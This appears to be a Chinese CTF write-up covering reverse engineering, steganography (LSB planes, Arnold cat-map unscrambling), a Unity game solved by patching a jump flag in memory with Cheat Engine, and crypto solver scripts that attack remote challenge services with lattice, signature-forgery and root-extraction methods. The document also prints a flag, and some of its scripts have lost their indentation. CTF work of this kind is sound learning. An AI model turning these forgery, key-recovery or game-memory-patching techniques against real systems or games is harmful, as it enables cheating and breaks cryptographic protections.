output = [] # 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,
res = []
def sub_7FF76BB31064():
    """Run ./b.py in a child process and report whether it exited with status 0.

    NOTE(review): b.py is not shown on this page; presumably it is the z3
    solver that inverts the substitution layer on the state kept in the
    'output' file.
    """
    status = os.system('python ./b.py')
    print('sub_7FF76BB31064 success' if status == 0 else 'sub_7FF76BB31064 error')
def sub_7FF76BB311B8():
    """Run ./c.py in a child process and report whether it exited with status 0.

    NOTE(review): c.py is not shown on this page; presumably it is the z3
    solver that inverts the bit-shuffling layer on the state kept in the
    'output' file.
    """
    failed = os.system('python ./c.py') != 0
    if failed:
        print('sub_7FF76BB311B8 error')
        return
    print('sub_7FF76BB311B8 success')
def www():
    """Run ./d.py in a child process and report whether it exited with status 0.

    NOTE(review): d.py is not shown on this page; presumably it is the z3
    solver that inverts the per-round mixing step.
    """
    exit_status = os.system('python ./d.py')
    verdict = 'success' if exit_status == 0 else 'error'
    print('www ' + verdict)
# Driver that walks the forward transform backwards. The state is passed
# between this script and the helper scripts through the file 'output', stored
# as comma-terminated decimal byte values.
# NOTE(review): this copy of the script has lost its indentation; the block
# structure has to be restored before it can run.
#
# Stage 1: undo the final XOR with sb.
output = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
# The trailing comma leaves an empty last field, hence len(s)-1.
for i in range(len(s)-1):
output.append(int(s[i]))
for i in range(len(output)):
res.append(output[i] ^ sb[i])
print(res)
with open('output','w+') as f:
for i in range(len(res)):
print(res[i],end=',',file=f)
# Stage 2: undo the closing S, P, S layers (helper calls in reverse order).
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
# Stage 3: undo the eight rounds, last round first.
for i in range(7,-1,-1):
print('time %d'%i)
output = []
res = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for k in range(len(s)-1):
output.append(int(s[k]))
# Remove this round's 24-byte block of box.
for k in range(len(output)):
res.append(output[k] ^ box[24 + k + 24 * i])
with open('output','w+') as f:
for k in range(len(res)):
print(res[k],end=',',file=f)
# Undo the mixing step, then the P, S, P, S layers of the round.
www()
sub_7FF76BB311B8()
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
print('\n')
# Stage 4: undo the initial XOR with box[0:24].
output = []
res = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for i in range(len(s)-1):
output.append(int(s[i]))
for i in range(len(output)):
res.append(output[i] ^ box[i])
with open('output','w+') as f:
for i in range(len(res)):
print(res[i],end=',',file=f)
print('\n')
# Stage 5: undo the opening S, P, S layers.
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
# Read the recovered bytes back and print them as a list and as characters.
output = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for i in range(len(s)-1):
output.append(int(s[i]))
print(output)
for i in range(len(output)):
print(chr(output[i]),end='')
# 91,143,45,174,250,174,246,228,179,110,109,57,220,13,123,70,189,52,40,142,58,234,7,23,
# 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,
MISC
Check in
FPS_game
打开游戏后 发现 说flag is up on
因为自己是做外挂的,所以很清楚知道 我们要做一个无限跳,unity游戏的判定为BOOL类型,所以CE直接附加去获取
可以获取到该位置为跳跃判定写入的地方
根据汇编读了一下逻辑,可以判断这个位置写入0改成1即可实现跳跃为地板
直接跳越
Lisa's cat
Description
Where is the cat?
Analyze
开始一张图,首先想到之前的题,看了看YCbCr各个通道的最低位
from PIL import Image
import numpy as np
from matplotlib import pyplot as plt
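# Load the watermarked image in YCbCr and look at the least-significant bit
# plane of each channel, where LSB-embedded data would show up.
p = Image.open('lisa_wm.png').convert('YCbCr')
p_data = np.array(p)
a, b = p_data.shape[0], p_data.shape[1]
Y = p_data[:, :, 0].reshape(a * b)
Cb = p_data[:, :, 1].reshape(a * b)
Cr = p_data[:, :, 2].reshape(a * b)
print(Y.shape, Cb.shape, Cr.shape)

# value % 2 keeps only the lowest bit; numpy applies it to the whole channel at
# once, which replaces the per-pixel Python loops.
r2Y = (Y % 2).reshape(a, b)
r2Cb = (Cb % 2).reshape(a, b)
r2Cr = (Cr % 2).reshape(a, b)

# Show the planes one after another, in the order Y, Cb, Cr.
for plane in (r2Y, r2Cb, r2Cr):
    plt.imshow(plane)
    plt.show()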
发现
里面有个Hello202166
然后hint:Cat is algo
说是有种猫的算法,稍微fuzz了一下找到是猫脸置乱,然后我们找到r0层的图像很奇怪而且和正常图片的r0不同
水印图片r0:
正常图片r0:
于是提取后对r0进行猫眼置换,爆破后发现参数a=20,b=21也正和前面的Hello202166对应(要不是爆破出来真找不到)
import numpy as np
from PIL import Image
def dearnold(img, a, b):
    """Apply the inverse Arnold (cat map) scramble with parameters a and b.

    Pixel (i, j) of ``img`` is written to position
    (((a*b + 1)*i - b*j) % rows, (-a*i + j) % cols) of a new uint8 array,
    which is returned. ``img`` is indexed as a 2-D array.
    """
    rows, cols = img.shape[0], img.shape[1]
    restored = np.zeros((rows, cols), np.uint8)
    row_gain = a * b + 1
    for i, j in np.ndindex(rows, cols):
        restored[(row_gain * i - b * j) % rows, (j - a * i) % cols] = img[i, j]
    return restored
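# Parameter search: try every (a, b) in 0..29 and save each candidate so the
# results can be inspected by eye.
source = np.array(Image.open('te4.png').convert('L'))
p = source
for a in range(30):
    for b in range(30):
        # Always transform the original image. Feeding the previous result back
        # in would stack all earlier (a, b) transforms on top of each other, and
        # the file name would no longer describe the picture it contains.
        p = dearnold(source, a, b)
        # The 'out/' directory must already exist.
        Image.fromarray(p, 'L').save('out/' + str(a) + ',' + str(b) + '.png')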
然后得到第二个猫图
这里十分模糊,怀疑是lisa原图片导致的,于是PS处理了一下lisa的R0图片
这里将白点黑点去了,然后将其与原R0图片进行xor,以提取出猫眼置乱里面大部分有用的数据像素,得到图片
进行猫眼置乱后得到
import numpy as np
from PIL import Image
def dearnold(img):
    """Apply the inverse Arnold (cat map) scramble with fixed a = 20, b = 21.

    Pixel (i, j) of ``img`` is written to position
    (((a*b + 1)*i - b*j) % rows, (-a*i + j) % cols) of a new uint8 array,
    which is returned. ``img`` is indexed as a 2-D array.
    """
    a, b = 20, 21
    rows, cols = img.shape[:2]
    restored = np.zeros((rows, cols), np.uint8)
    for i in range(rows):
        row_term = (a * b + 1) * i
        col_term = -a * i
        for j in range(cols):
            restored[(row_term - b * j) % rows, (col_term + j) % cols] = img[i, j]
    return restored
# Single pass of the inverse cat map over the cleaned-up image; the result is
# saved as out/0.png (the 'out/' directory must already exist).
count = 0
print(count)
scrambled = np.array(Image.open('te3.png').convert('L'))
p = dearnold(scrambled)
target = 'out/' + str(count) + '.png'
Image.fromarray(p, 'L').save(target)
flag
ByteCTF{the Multimedia Security in ByteDance!}
Undercover
题目是一张图片,打开图片链接为:
根据题目提示,将url中的img修改为origin,并删除url中不必要的部分,得到如下图片:
https://p3.toutiaoimg.com/origin/tos-cn-i-qvj2lq49k0/7a19b5d53d014130ab3c00f73a8d4645
用010editor打开可以发现该图有exif信息,标记了作者为Zach Oakes
搜索一下该作者名字,即可发现一个pixeljihad工具
将origin图片利用该在线网站解密一下即可得到flag
问卷
Crypto
overheard_plus
得到的数形式为 $y=(h \ll 223)+(x \ll 33)+l$
其中h,l未知
乘一个系数k,使得 $(k \ll 223) \bmod p$ 和 $k$ 都比较小
构造格即可求出k
# Sage snippet ('^' is exponentiation here). Finds a small multiplier k for
# which k * 2^223 mod p is small as well.
p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
# Row 0 ties k (columns 0 and 2) to k * 2^223 (column 1); the two rows holding
# p allow reduction modulo p.
A = matrix([
    [1, 2^223, 1],
    [0, p, 0],
    [0, 0, p],
])
reduced = A.LLL()
print(reduced[1])
(-407264873754589862949021245515678128869, -169966136630445589168644392667586870802, -407264873754589862949021245515678128869)
得到k为407264873754589862949021245515678128869
然后就转化为HNP问题
from pwn import *
from random import*
# Sage script ('^' is exponentiation; matrix, QQ and LLL come from Sage) that
# talks to the challenge service through pwntools.
# NOTE(review): this copy has lost its indentation; the loop and if bodies have
# to be restored before it can run.
p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
g = 12
bits = 33
# mark is never used below.
mark = (1 << (256 - bits)) - 1
sh=remote("47.94.238.93","30001")
sh.recv().decode()
# NOTE(review): the meaning of menu options 1-4 is defined by the service and
# not shown on this page. Presumably 1 and 2 return the two public values,
# 3 answers a query for a submitted value and 4 accepts the final answer.
sh.sendline(b"1")
a=int(sh.recvuntil(b"\n",drop=True).decode())
print(sh.recvuntil(b"$ "))
sh.sendline(b"2")
b=int(sh.recvuntil(b"\n",drop=True).decode())
sh.recvuntil(b"$ ")
sh.sendline(b"3")
sh.sendline(str(a).encode())
sh.recvuntil(b"Bob: ")
# r is read but not used afterwards.
r=(int(sh.recvuntil(b"\n").decode()))
sh.recvuntil(b"$ ")
cnt=0
# Multiplier found with the small lattice above.
k=407264873754589862949021245515678128869
B=[]
A=[]
# Collect nine samples: query a * g^i mod p, store the reply scaled by k in B
# and the matching coefficient b^i * k mod p in A.
for i in range(1,10):
sh.sendline(b"3")
sh.sendline(str(a*pow(g,i,p)%p).encode())
sh.recvuntil(b"Bob: ")
B.append(int(sh.recvuntil(b"\n").decode())*k%p)
A.append(pow(b,i,p)*k%p)
sh.recvuntil(b"$ ")
# Build the s x s lattice for the hidden number problem: p on the diagonal,
# the A coefficients in row s-2 and the B values in row s-1 (only the first
# s-2 = 3 samples are used).
M=[]
s=5
# k is rebound to 1 here, so the "* k" factors below leave the entries unchanged.
k=1
for i in range(s):
l=[0]*s
l[i]=p*k
if(i==s-2):
for j in range(s-2):
l[j]=A[j]*k
if(i==s-1):
for j in range(s-2):
l[j]=B[j]*k
M.append(l)
M[-1][-1]=2^160
# list.copy() is shallow: m and M share the same row lists.
m=M.copy()
# Weight of the column whose entry in the reduced vector is read back below.
m[-2][-2]=1/2^90
m=matrix(QQ,m)
print(m.LLL()[0][-1])
print(m[-1][-1])
sh.sendline(b'4')
# Undo the 1/2^90 scaling of that column before submitting the value.
sh.sendline(str(abs(m.LLL()[0][-2]*2^90)%p).encode())
print(sh.recvall())
forgery
from Crypto.Util.number import *
from Crypto.Cipher import AES
from random import randint
from hashlib import sha256
from curve import *
import requests
# Base URL of the challenge service.
url = 'http://47.94.238.93:30002/'
# Hex-encoded values; the 128-digit ones are parsed below by Make_Point as an
# x coordinate (first 64 digits) followed by a y coordinate, the 64-digit ones
# as plain integers.
# NOTE(review): presumably these are the signature components published by the
# challenge - the page does not say where they come from.
Q_P_hex = '6a04ab98d9e4774ad806e302dddeb63bea16b5cb5f223ee77478e861bb583eb3' \
'36b6fbcb60b5b3d4f1551ac45e5ffc4936466e7d98f6c7c0ec736539f74691a6'
M_hex = '654791f7bca3e1815565f63614b59bed6a0b99c3ed19098151d3f0f95cbba40a' \
'890459f6459ff42449933fec80cd2ca5c3613f28491a26554e15de1dffd374f7'
Z_hex = '511431636a07ec6eb9d54cfda8aa559b3c09d9ff99ec84af9bcb87c47170e324' \
'4d5c0b3d4d3692647ab92007454a2f6b6b88a860662a8e87a824284f3111b4be'
s_hex = '3c0cb0d73eb950f85b6d2f51ebc6223eba41191357a2c15f3fafa05d956d0675'
e_hex = 'cb562bf69faa92cdcb7ab2cc447f06516a01fb7c46ebcf143bba8d02ef074541'
K_hex = 'f7b804d4ca67eae2b9252a8fe4e4f0b329d1156124227e6cb0cbeb130318dd29' \
'c614cbbfb21909516e65cfad3d650c65246e016b36e55635036e93c05d4bf045'
f_hex = '53e53621c90abe1fd78a555a62474c31c9fb5b1a339a9472b914e9b8f089d721'
v_hex = '4898a5d7c579946a7c9e2ed05fb313b868884d6880a099645895d17ea77bf87f'
def H(msg):
    """Return the SHA-256 digest of ``msg`` (bytes) as a non-negative integer."""
    digest = sha256(msg).digest()
    return int.from_bytes(digest, 'big')
def get_x(point):
    """Return the x coordinate of ``point`` as bytes, left-padded with zero
    bytes to 32 bytes (longer encodings are returned unchanged)."""
    encoded = long_to_bytes(point.x)
    return encoded.rjust(32, b'\x00')
def Make_Point(hexdata, Negate=False):
    """Build a Point from 128 hex digits: x is the first 64 digits, y the rest.

    ``Negate`` is accepted but not used.
    """
    assert len(hexdata) == 128
    x_hex, y_hex = hexdata[:64], hexdata[64:]
    return Point(int(x_hex, 16), int(y_hex, 16))
def get_Negate(point):
    """Return the point with the same x coordinate and the negated y coordinate.

    The coordinates are taken from ``str(point)``, read as 64 hex digits of x
    followed by the hex digits of y.
    """
    encoded = str(point)
    x = int(encoded[:64], 16)
    y = int(encoded[64:], 16)
    return Point(x, -y)
# Decode the hex constants into curve points and integers.
Q_P = Make_Point(Q_P_hex)
M = Make_Point(M_hex)
Z = Make_Point(Z_hex)
K = Make_Point(K_hex)
s = int(s_hex, 16)
e = int(e_hex, 16)
f = int(f_hex, 16)
v = int(v_hex, 16)
# Curve parameters from the challenge's own curve module: group order n and
# base point G.
mycurve = curve()
n = mycurve.order
G = mycurve.G
def get_pubkey():
    """Fetch the comma-separated public keys from ``forgery/pks`` and return
    them as a list of Points (64 hex digits of x followed by those of y).

    The request is made without a timeout.
    """
    response = requests.get(url + 'forgery/pks')
    keys = []
    for item in response.text.split(','):
        keys.append(Point(int(item[:64], 16), int(item[64:], 16)))
    return keys
def connect(req):
    """Send ``req`` as the body of a GET request to ``forgery/req`` and return
    the response text. The request is made without a timeout."""
    response = requests.get(url + 'forgery/req', data=req)
    return response.text
# NOTE(review): this copy has lost its indentation; the for/if bodies have to
# be restored before it can run.
pubkey = get_pubkey()
# Step 1: find the listed public key Q_o for which the given (s, e, Z, M)
# verifies, i.e. H(x(R) || x(M)) == e with R recomputed from that key.
for Q_o in pubkey:
R = s * G + e * get_Negate(Q_P) + e * Q_o + Z
tmp = get_x(R) + get_x(M)
if H(tmp) == e:
# print(Q_o)
break
# Step 2: pick fresh random scalars and build new (M, Z, s, e) values that
# satisfy the same relation; Z is solved for last so that the recomputed R
# matches.
a, b, m, s = (randint(1, n) for i in range(4))
M = m * G
R = b * G + (a+b) * get_Negate(Q_P) + a * get_Negate(K + K.x * Q_o)
e = H(get_x(R) + get_x(M))
Z = R + get_Negate(s * G + e * Q_o + e * get_Negate(Q_P))
# NOTE(review): hex(s)[2:] and hex(e)[2:] are not zero-padded to 64 digits, so
# a value with leading zero nibbles would shift the fields of the request.
resp = connect(str(M) + str(Z) + hex(s)[2:] + hex(e)[2:])
# Response: 128 hex digits of a point L, then the hex-encoded ciphertext blob.
L, C = resp[:128], long_to_bytes(int(resp[128:], 16))
# Shared point m * L; the AES key is the SHA-256 of its x coordinate.
Y = m * Make_Point(L)
sk = long_to_bytes(H(get_x(Y)))
# Blob layout: 12-byte nonce, ciphertext, 16-byte GCM tag.
iv, cipher, tag = C[:12], C[12:-16], C[-16:]
cip = AES.new(sk, AES.MODE_GCM, iv)
plaintext = cip.decrypt_and_verify(cipher, tag)
print(plaintext)
GodOnlyKnows
因为p和q都比m大,所以 $m \bmod p = m$
因为 e|(q-1),所以采用AMM算法直接开根
第一个E可以分解,所以分两次开根
第二个开根后寻找多解即可
from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
import random
import time
def AMM(o, r, q):
    """Adleman-Manders-Miller root extraction: return one r-th root of ``o``
    in GF(q).

    Sage code: ``^`` is exponentiation, and ``GF`` and ``discrete_log`` are
    Sage builtins. Which of the r-th roots is returned is not specified.
    """
    field = GF(q)
    o = field(o)
    # Random element whose (q-1)/r-th power is not 1, i.e. not an r-th power.
    p = field(random.randint(1, q))
    while p ^ ((q-1) // r) == 1:
        p = field(random.randint(1, q))
    # Write q - 1 = r^t * s with r not dividing s.
    t = 0
    s = q - 1
    while s % r == 0:
        t += 1
        s = s // r
    # Smallest k >= 1 with k*s + 1 divisible by r, giving alp = (k*s + 1) / r.
    k = 1
    while (k * s + 1) % r != 0:
        k += 1
    alp = (k * s + 1) // r
    a = p ^ (r**(t-1) * s)
    b = o ^ (r*alp - 1)
    c = p ^ s
    h = 1
    # Correct the candidate step by step; each step may need one discrete
    # logarithm to the base a.
    for i in range(1, t):
        d = b ^ (r^(t-1-i))
        j = 0 if d == 1 else - discrete_log(d, a)
        b = b * (c^r)^j
        h = h * c^j
        c = c^r
    return o^alp * h
def findAllPRoot(p, e):
    """Collect e distinct e-th roots of unity modulo ``p`` by raising random
    values to the power (p-1)//e, and print progress and timing.

    The set includes 1. The loop only ends once e distinct values have been
    found, so e has to divide p - 1. A second definition with the same name
    follows and replaces this one at import time.
    """
    print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
    started = time.time()
    exponent = (p - 1) // e
    roots = set()
    while len(roots) < e:
        roots.add(pow(random.randint(2, p - 1), exponent, p))
    finished = time.time()
    print("Finished in {} seconds.".format(finished - started))
    return roots
def findAllPRoot(p, e):
    """Collect e distinct e-th roots of unity modulo ``p`` by raising random
    values to the power (p-1)//e (quiet version, no progress output).

    The set includes 1. The loop only ends once e distinct values have been
    found, so e has to divide p - 1.
    """
    exponent = (p - 1) // e
    roots = set()
    while len(roots) < e:
        candidate = random.randint(2, p - 1)
        roots.add(pow(candidate, exponent, p))
    return roots
def findAllSolutions(mp, proot, cp, p):
    """Return every e-th root of ``cp`` modulo ``p``, obtained by multiplying
    the known root ``mp`` with each root of unity in ``proot``.

    The exponent ``e`` is read from the module-level variable of that name,
    so it must be set to the matching value before the call.
    """
    all_mp = set()
    for unit in proot:
        candidate = mp * unit % p
        # Every product must still be an e-th root of cp.
        assert pow(candidate, e, p) == cp
        all_mp.add(candidate)
    return all_mp
# Ciphertext and the prime it is reduced by. The exponent is handled in two
# stages: 211-th roots first, then 44111-th roots of each candidate.
# NOTE(review): this copy has lost its indentation; the nested loop bodies have
# to be restored before it can run.
c = 772565936593515938615082083850938362613089734342287771128291472104046319862613350056956062118550321631866813148814858579940359488835406488192045892079962698714252480664060419953439936847467151951707711960564168524184204271995270327245725984919428149639973357868675592483006928997726613457380488261635041869597307398729507697158613168850704328530399405169680463230053377431335337779463633029295955858696902803386120356749863623596613941801330124207586725374756181745511923539633446661442068957315168820238937280405617065015285700322895085706754898061230539082769025995120039459396808799117648271570269985484502094854
p = 95687551158424870143703739707287468414611369850139196417287508089211979118193675929506850803149358301728120409275929342331337905599313606088428402839878372487170692490462929725396373203204226843802423181196898778481793325131946863940863769074896156910428463093571864657722422072768906417568334359470218805533
e = 211
cp = c % p
mp = AMM(cp, e, p)
# The AMM result is immediately replaced by this literal, presumably a root
# saved from an earlier run.
mp = 31345202442790442920115697500450071818235900375500159009967056807830626140001529729676300258209996171069560742047328078130191327123345680723213339636646321741052218138744674334328183312558923865595390705797974430312426267394255850679294885677465520683090066528255100591795102268647400226323338312621641629616
p_proot = findAllPRoot(p, e)
mps = findAllSolutions(mp, p_proot, cp, p)
# Second stage. findAllSolutions reads the module-level e, so e has to be
# switched to 44111 before the calls below.
e = 44111
p_proot2 = findAllPRoot(p, e)
for i in tqdm(mps):
ans = AMM(i, e, p)
roots = findAllSolutions(ans, p_proot2, i, p)
for j in roots:
tmp = long_to_bytes(j)
# Keep only candidates whose bytes look like a printed tuple "(..., ...)".
if tmp[:1] == b'(' and tmp[-1:] == b')' and b', ' in tmp:
print(tmp)
from Crypto.Util.number import bytes_to_long, long_to_bytes
# Final step: combine the recovered values into the secret.
# NOTE(review): the page does not say where A, q, ms and y come from;
# presumably they are the tuple printed by the previous script plus values
# given by the challenge.
A = 792238572269794055348910087761887177847370603197600830370527259419768807858348001691036300215434808111877711734709055694630017772989997444234251
q = 1681729884196728426347201605286291421761851787915662035433940062673379044738871872632638818413406117567884236926797281113873191085369214060655427
ms = b'\xdd\x13\xb3\x03\xbbeX4\x96 \xd4f\xff\xbfX",\xeac\x08\xa1O\xacdx\xf6\x98\xc7%.r\xf6[\n\xa2\x0f\xa0\xbf\x9a\xe4yJ\xe3\xf9\xd4\xad\xd9\t\x14N\xd2]\xb3\\q0_\xe0z\xf3'
y = b'O\xce8?\xd1\xc3\x02\xd7\xb7\xd7\xe7\x91\xc1\xe6\xe5i\x817h\x02\x1b\xccw-\x88*W\x03\xc8\x91\x80\xf2\x13\t\xab\x92\xf9M\xf7f\xfb\xef,\x0fD"\x9fx\xf0T\xcbd\x0c\xc2Q^\xda\xbb\xa8^'
# Interpret both byte strings as big-endian integers.
ms = bytes_to_long(ms)
y = bytes_to_long(y)
# % binds tighter than -, so this is y - ((A * q) % ms).
secret = y - (A * q) % ms
print(long_to_bytes(secret))